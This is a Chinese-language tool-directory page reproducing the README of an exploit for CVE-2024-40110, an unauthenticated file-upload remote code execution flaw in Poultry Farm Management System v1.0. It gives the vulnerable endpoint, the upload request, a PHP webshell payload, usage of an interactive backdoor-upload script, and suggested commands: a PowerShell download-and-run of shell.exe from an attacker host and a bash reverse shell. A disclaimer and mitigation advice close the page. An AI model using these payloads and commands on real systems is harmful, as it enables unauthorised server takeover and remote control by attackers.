Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-40110 — 针对CVE-2024-40110的漏洞利用,这是Poultry Farm Management System v1.0中的一个未认证文件上传RCE漏洞。上传PHP shell以在目标上执行任意命令。 | Kitploit
工具/GitHubGitHub/angry-althaf/cve-2024-40110
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubangry-althaf/cve-2024-40110

CVE-2024-40110

针对CVE-2024-40110的漏洞利用,这是Poultry Farm Management System v1.0中的一个未认证文件上传RCE漏洞。上传PHP shell以在目标上执行任意命令。

查看仓库
18个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

家禽养殖管理系统 v1.0 - 远程代码执行漏洞

漏洞类型

未认证文件上传导致远程代码执行

描述

家禽养殖管理系统 v1.0 的产品上传功能存在严重漏洞。该应用程序未能正确验证和清理文件上传,允许攻击者上传伪装成产品图片的 PHP 文件。这些上传的 PHP 文件可以被执行,从而实现远程代码执行。

易受攻击的端点

root@kitploit:~
POST /paultry/farm/product.php 或 POST /farm/product.php

攻击向量

可通过以下方式利用该漏洞:

  1. 向产品上传端点发送 POST 请求
  2. 上传包含任意命令的 PHP shell 文件
  3. 访问上传的文件以执行嵌入的命令

要求

前提条件

  • Python 3.7+
  • requests 库
  • colorama 库(用于彩色输出)
  • 网络访问易受攻击的目标

安装

root@kitploit:~
pip install requests colorama

或安装所有依赖项:

root@kitploit:~
pip install -r requirements.txt

使用方法

基本用法

以交互模式运行脚本:

root@kitploit:~
python exploit.py

脚本将提示您输入:

  1. 目标 IP 地址 - 易受攻击的服务器的 IP 地址
  2. 目标端口 - 端口号(默认:80)
  3. 要执行的命令 - 在目标上运行的系统命令

示例

root@kitploit:~
==================================================
Interactive Backdoor Upload Tool
==================================================

Enter target IP address: 192.168.1.100
Enter target port (default: 80): 8080
Enter command to execute (default: powershell payload):
Command: whoami

==================================================
CONFIRMATION
==================================================
Target URL: http://192.168.1.100:8080
Command: whoami
Do you want to proceed? (yes/no): yes

功能特性

✅ 交互输入 - 提示输入 IP、端口和自定义命令
✅ 默认值 - 提供合理的默认值以方便使用
✅ 彩色输出 - 易读的彩色终端输出
✅ 确认步骤 - 在执行前验证设置
✅ 错误处理 - 对失败请求给出友好的错误消息
✅ 灵活的命令 - 支持任何 shell 命令或 PowerShell payload

常用命令

Windows 目标

root@kitploit:~
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"

Linux 目标

root@kitploit:~
bash -i >& /dev/tcp/attacker-ip/4444 0>&1

信息收集

root@kitploit:~
whoami
id
ifconfig
hostname
pwd

技术细节

工作原理

  1. 文件上传:发送一个包含 PHP payload 作为文件的 POST 请求
  2. Payload 执行:上传的 PHP 文件存储在 /assets/img/productimages/
  3. 命令执行:访问 PHP 文件通过 system() 函数触发命令执行
  4. 输出获取:脚本通过 GET 请求获取输出

请求结构

root@kitploit:~
POST /paultry/farm/product.php
Content-Type: multipart/form-data

category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]

Payload 格式

root@kitploit:~
<?php system('COMMAND_HERE');?>

测试环境

该漏洞已在以下环境测试:

  • 操作系统: Windows 10
  • 服务器: XAMPP v3.3.0
  • PHP 版本: 兼容 PHP 5.6+

免责声明

⚠️ 法律警告

此工具仅供 授权的安全测试和教育目的 使用。未经授权访问计算机系统是非法的。

  • 仅在本机拥有或已获得明确书面许可的系统上使用此漏洞
  • 作者对因使用本工具造成的误用或损害不承担任何责任
  • 用户有责任确保遵守所有适用的法律法规
  • 未经授权访问、修改或破坏计算机系统根据《计算机欺诈和滥用法》(CFAA)及全球类似法律构成联邦犯罪

缓解措施

针对管理员

  1. 更新软件 - 如有可能,应用安全补丁

  2. 文件上传验证

    • 验证文件扩展名(白名单:jpg, png, gif 等)
    • 在服务器端检查 MIME 类型
    • 将上传的文件存储在 Web 根目录之外
    • 禁用上传目录中的脚本执行
  3. 配置

    root@kitploit:~
    <Directory /uploads>
        php_flag engine off
        AddType text/plain .php .phtml .php3 .php4 .php5 .phar
    </Directory>
    
  4. 访问控制

    • 在允许上传之前实施身份验证
    • 验证用户权限
    • 添加速率限制
  5. 监控

    • 监控上传目录中的可疑文件
    • 记录所有上传尝试
    • 实施文件完整性检查

参考资源

  • Exploit DB: https://www.exploit-db.com/exploits/52053
  • GitHub: https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
  • 原始软件: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

故障排除

连接被拒绝

root@kitploit:~
Error: Connection refused
Solution: Verify the target IP and port are correct and the application is running

404 未找到

root@kitploit:~
Error: Failed to upload shell. Status code: 404
Solution: The endpoint path may differ. Common paths: /farm/, /paultry/farm/

PHP 未执行

root@kitploit:~
Error: Command output is empty
Solution: PHP execution may be disabled or the file wasn't uploaded correctly

支持

如有问题、疑问或改进建议,请参考 GitHub 仓库或 Exploit-DB 页面。


最后更新: 2024 年 12 月
状态: 已验证和测试

下载工具